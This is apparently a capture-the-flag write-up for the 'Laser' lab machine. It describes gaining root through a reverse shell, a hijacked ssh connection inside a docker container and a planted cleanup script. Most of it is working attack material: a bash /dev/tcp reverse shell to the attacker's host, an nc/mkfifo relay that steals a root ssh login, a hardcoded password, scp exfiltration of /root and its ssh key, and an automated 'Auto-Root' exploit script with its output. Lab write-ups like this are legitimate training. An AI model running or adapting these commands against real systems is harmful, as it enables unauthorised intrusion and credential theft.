Procedure
Firstly, I start an nc
shell on my attacking host...
> nc -lvp 1337
listening on [any] 1337 ...
I now move to a user shell as solr
on laser
, using a simple chmod 555
to r-xr-xr-x
the /tmp/clear.sh
script. This read-only should do the trick, but I'll have to see whether it works out.
solr@laser:/opt/solr/server$ echo 'bash -i >& /dev/tcp/10.10.14.2/1337 0>&1 ' > /tmp/clear.sh
solr@laser:/opt/solr/server$ chmod 555 /tmp/clear.sh
solr@laser:/opt/solr/server$ sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2
Entering the docker container, I remove the ssh daemon's binding, use mkfifo
to create a file for piping, and send incoming connections back out to the host. The piping technique was modified from the first example in this blog post about nc
proxying.
kill -9 $(pgrep -f listener)
cd /tmp
mkfifo molzy
while true; do ./nc -l 22 0< ./molzy | ./nc 172.18.0.1 22 1> ./molzy; done
Editor's note: first try was without the while loop. The pipe didn't stay connected, and I did not obtain the root
shell.
We Have root.txt
In the new reverse shell:
connect to [10.10.14.2] from laser.htb [10.10.10.201] 37814
bash: cannot set terminal process group (2541141): Inappropriate ioctl for device
bash: no job control in this shell
root@laser:~# ls
clear.sh
feed.sh
reset.sh
root.txt
snap
update.sh
root@laser:~# whoami
root
root@laser:~# cat root.txt
32237fa...
Fantastic!
For a more reliable connection post-exploitation, there is a fixed ssh
key present in /root/.ssh/id_rsa
.
Life After Root
Copying Scripts
I proceeded to download the ssh
key, and scp -r
the /root
directory and /opt
directory, for later fun and analysis.
> scp -r -i id_rsa root@laser.htb:/root root
load pubkey "id_rsa": invalid format
241e69162522ccf5846a2f42ebc24b17464915a155679666b89a9f31 100% 72 2.6KB/s 00:00
#--[[snip]]--
> scp -r -i id_rsa root@laser.htb:/opt opt
load pubkey "id_rsa": invalid format
commons-lang3-3.8.1.jar 100% 490KB 2.8MB/s 00:00
#--[[snip]]--
It turned out that /opt
contained two copies of Apache Solr, weighing in at 200MB each - don't repeat my mistake if you are on a low bandwidth connection!
The scripts that have been running in the background were mostly found in /root
, with the exception of /opt/updates/run.sh
, which was only used to make the sshpass
race condition more common.
Where Was The Crontab?
The aformentioned scripts were not listed in /etc/crontab
or similar - they ended up being in /var/spool/cron/crontabs/root
!
root@laser:/var/solr# cat /var/spool/cron/crontabs/root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.Hv26Fi/crontab installed on Tue Aug 4 06:55:22 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# --[[snip]]--
# m h dom mon dow command
@reboot /root/feed.sh
*/5 * * * * docker stop laser && docker start laser && docker exec laser service ssh restart
* * * * * rm /opt/printer/logs/*.log
* * * * * /root/update.sh
*/3 * * * * /root/reset.sh
* * * * * rm /var/solr/logs/*
/opt/printer/printer.py
is the printer server, and it is quite neat to read through.
Auto-Root Script
I created a quick bash
script which uses the steps documented above, including the solr.py
script, to automatically gain a reverse shell as the root
user.
#!/usr/bin/env bash
# attacking host ip address
ipadd=$(ip addr | grep -o "10.10.14.[^/]*")
# gain reverse shell as the solr user, async
python3 solr.py > /dev/null &disown
# create and trigger reverse shell as root through docker
# container located at 172.18.0.2, async
echo "
echo 'bash -i >& /dev/tcp/${ipadd}/1337 0>&1 ' > /tmp/clear.sh
chmod 555 /tmp/clear.sh
sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2
kill -9 \$(pgrep -f listener)
mkfifo /tmp/molzy
while true; do /tmp/nc -l 22 0< /tmp/molzy | /tmp/nc 172.18.0.1 22 1> /tmp/molzy; done
exit
" | nc -lvp 4444 > /dev/null &disown
# wait for the reverse shell as root to connect
nc -lvp 1337
Running the script provides the following reverse shell connection within a minute:
> ./root.sh
listening on [any] 1337 ...listening on [any] 4444 ...
10.10.10.201 - - [xx/xxx/2020 xx:xx:xx] "GET /ex.sh HTTP/1.1" 200 -
10.10.10.201 - - [xx/xxx/2020 xx:xx:xx] "GET /ex.sh HTTP/1.1" 200 -
connect to [10.10.14.28] from laser.htb [10.10.10.201] 49020
connect to [10.10.14.28] from laser.htb [10.10.10.201] 50604
bash: cannot set terminal process group (277095): Inappropriate ioctl for device
bash: no job control in this shell
root@laser:~# id && hostname && wc -c /root/root.txt
uid=0(root) gid=0(root) groups=0(root)
laser
33 /root/root.txt
root@laser:~#
Well done to the box authors on a fulfilling and enjoyable breaking-and-entering experience!